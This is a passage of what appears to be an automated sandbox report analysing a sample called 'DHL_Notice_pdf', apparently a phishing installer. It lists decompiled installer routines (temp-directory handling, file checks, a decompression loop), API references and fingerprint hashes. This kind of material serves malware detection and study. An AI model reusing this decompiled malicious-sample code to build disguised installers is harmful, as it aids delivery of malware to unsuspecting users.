								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                            0x004015c1
                                                            0x004015c9
                                                            0x004015cc
                                                            0x004015d1
                                                            0x004015d5
                                                            0x004015d7
                                                            0x004015df
                                                            0x004015e1
                                                            0x004015e4
                                                            0x004015ea
                                                            0x00401604
                                                            0x00401607
                                                            0x004015ec
                                                            0x004015ec
                                                            0x004015ef
                                                            0x00000000
                                                            0x004015fa
                                                            0x004015fd
                                                            0x004015fd
                                                            0x004015ef
                                                            0x0040160e
                                                            0x00401615
                                                            0x00401624
                                                            0x00401624
                                                            0x00401617
                                                            0x0040161a
                                                            0x00401622
                                                            0x00000000
                                                            0x00000000
                                                            0x00401622
                                                            0x00401615
                                                            0x00401627
                                                            0x0040162b
                                                            0x0040162c
                                                            0x004015d7
                                                            0x00401634
                                                            0x00401663
                                                            0x004022f1
                                                            0x00401636
                                                            0x00401638
                                                            0x00401645
                                                            0x0040164d
                                                            0x00401655
                                                            0x0040165b
                                                            0x0040165b
                                                            0x00401655
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                            • API String ID: 1892508949-501415292
                                                            • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                            • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                            C-Code - Quality: 53%
                                                            			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                            0x0040604b
                                                            0x00406056
                                                            0x0040605a
                                                            0x00406061
                                                            0x0040606d
                                                            0x0040607d
                                                            0x0040607f
                                                            0x00406097
                                                            0x00406098
                                                            0x0040609f
                                                            0x004060a0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406083
                                                            0x0040608a
                                                            0x00406092
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040608a
                                                            0x004060a2
                                                            0x004060a8
                                                            0x00000000
                                                            0x004060b6
                                                            0x0040606f
                                                            0x00406075
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406075
                                                            0x0040605c
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                                                            • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: P_B
                                                            • API String ID: 3248276644-906794629
                                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 711 407447-40744d 705->711 709 4074f0-407505 706->709 710 407507-40751a 706->710 707->711 712 407426-40743e 708->712 713 4075cf-4075d9 708->713 714 40751d-407524 709->714 710->714 716 406bf2 711->716 717 4075fa 711->717 712->707 718 4075e5-4075f8 713->718 719 4074c4 714->719 720 407526 714->720 721 406bf9-406bfd 716->721 722 406d39-406d5a 716->722 723 406c9e-406ca2 716->723 724 406d0e-406d12 716->724 726 4075fd-407601 717->726 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->718 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->718 729->717 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->718 736 406cc4-406cc8 732->736 733->718 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->717 748 406c81 743->748 744->736 745->744 745->745 746->717 746->741 747->746 748->737
                                                            C-Code - Quality: 99%
                                                            			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
